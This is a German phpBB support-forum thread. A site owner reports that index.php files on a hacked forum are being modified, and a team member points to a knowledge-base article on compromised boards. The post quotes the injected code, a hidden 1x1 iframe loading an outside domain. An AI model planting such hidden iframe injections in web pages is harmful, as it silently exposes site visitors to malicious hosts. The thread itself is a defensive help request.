Hoffe jemand kann mir helfen.
ich habe meine Forum bei 1und1. bis Donnerstag lief alles tadellos.
Dann war es auf einmal nicht erreichbar mit der Fehlermeldung:
Parse error: syntax error, unexpected '?' in /homepages/1/d257909023/htdocs/neu/phpBB3/index.php on line 139
dort schleicht sich nach dem ?
immer etwas ein wie hier z.B. html><body><iframe src="http://bali-planet.com/" width="1" height="1" frameborder="0"></iframe></body></html>>
dabei kam letztens der Link für akstat.com, usw....
das betrifft alle index.php dateien.
Das geschah meistens nachts.
Die liegen aber auf dem Server von 1und1.
Was könnte ich da machen?
index.php dateien werden geändert
Forumsregeln
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
phpBB 3.0 hat das Ende seiner Lebenszeit überschritten
phpBB 3.0 wird nicht mehr aktiv unterstützt. Insbesondere werden - auch bei Sicherheitslücken - keine Patches mehr bereitgestellt. Der Einsatz von phpBB 3.0 erfolgt daher auf eigene Gefahr. Wir empfehlen einen Umstieg auf die neuste phpBB-Version, welches aktiv weiterentwickelt wird und für welches regelmäßig Updates zur Verfügung gestellt werden.
- Mahony
- Ehemaliges Teammitglied
Hallo
Siehe dazu KB:gehackt
Grüße: Mahony
Siehe dazu KB:gehackt
Grüße: Mahony
Wer fragt, ist ein Narr für fünf Minuten, wer nicht fragt, ist ein Narr für immer.
Re: index.php dateien werden geändert
Hallo Mahony,
danke für deinen Link,
genau das habe ich befürchtet
Die Datenbank habe ich komplett gesichert gehabt.
ich werde erstmal alles auf den Server löschen, bis auf die Log Dateien von 1und1, die kann ich ja leider nicht löschen.
danke für deinen Link,
genau das habe ich befürchtet

Die Datenbank habe ich komplett gesichert gehabt.
ich werde erstmal alles auf den Server löschen, bis auf die Log Dateien von 1und1, die kann ich ja leider nicht löschen.